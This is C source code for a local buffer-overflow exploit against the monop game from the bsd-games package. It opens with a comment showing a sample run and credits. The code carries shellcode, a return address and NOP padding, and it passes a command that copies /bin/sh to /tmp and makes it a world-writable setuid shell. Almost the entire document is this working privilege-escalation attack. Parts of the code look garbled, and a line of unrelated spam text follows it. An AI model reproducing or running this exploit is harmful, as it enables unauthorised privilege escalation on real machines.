/* U-N-F http://www.u-n-f.com monosex - monop game local exploit - from bsd-games package - by ^sq Second player's name buffer overflow. Based on qobaiashi's u-n-f advisory. Shouts: UNF, wsxz, qobaiashi, sxynx, DragonK, dtorsBob, LSD, s0t4ipv6 deltha@slack9:~$ ./monosex MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOW [+] Ret addy: 0x8050102 [+] Shellcode addy: 0xbffff2d0 uid=102(deltha) gid=20(games) groups=102(deltha) ls:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB12: No such file or directory 459881 -rwsrwxrwx 1 deltha games 628664 Aug 23 01:31 /tmp/kurwa */ #include #include #define BUFPIPE 512 #define CMD "rm -f /tmp/kurwa; id; cp /bin/sh /tmp/kurwa; chmod 4777 /tmp/kurwa; ls -ila /tmp/kurwa " #define VULN "/usr/games/monop" int main(int argc, char **argv) { FILE *pr; char newline[2]="\n"; pr = popen(VULN,"w"); char asd[BUFPIPE]; char firstplayer[93]; char buf[300+4]; char env[1024]; int ret = 0x8050102; char shellcode[] = /* setregid (20,20) shellcode */ "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" "\xcd\x80" /*Lsd sh -c shellcode */ "\xeb\x22" /* jmp */ "\x59" /* popl %ecx */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""http://sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x66\x68""-c" /* pushw $0x632d */ "\x89\xe7" /* movl %esp,%edi */ "\x50" /* pushl %eax */ "\x51" /* pushl %ecx */ "\x57" /* pushl %edi */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd9\xff\xff\xff" /* call */ ; printf("MONOSEX - U-N-F MONOP LOCAL BUFFER OVERFLOW\n"); printf("[+] Ret addy: 0x%x\n", ret); printf("[+] Shellcode addy: 0x%x\n", shellcode); //firstplayer increment to avoid heap addresses which contains zeros memset(firstplayer, 0x42, 92); memset(buf, 0x90, 300); memcpy(&buf[300], (char *)&ret, 4); memcpy(&buf[300 - strlen(shellcode) - strlen(CMD)],shellcode,strlen(shellcode)); memcpy(&buf[300 - strlen(CMD)],CMD,strlen(CMD)); if (!pr) abort(); // How many players? 2 strcpy(asd,"2"); strcat(asd,newline); fputs(asd,pr); fflush(pr); // Player 1's name: fputs(firstplayer,pr); strcat(asd,newline); fputs(asd,pr); fflush(pr); // Player 2's name: overflow fputs(buf,pr); strcat(asd,newline); fputs(asd,pr); fflush(pr); pclose(pr); return 0; }

亚洲欧美在线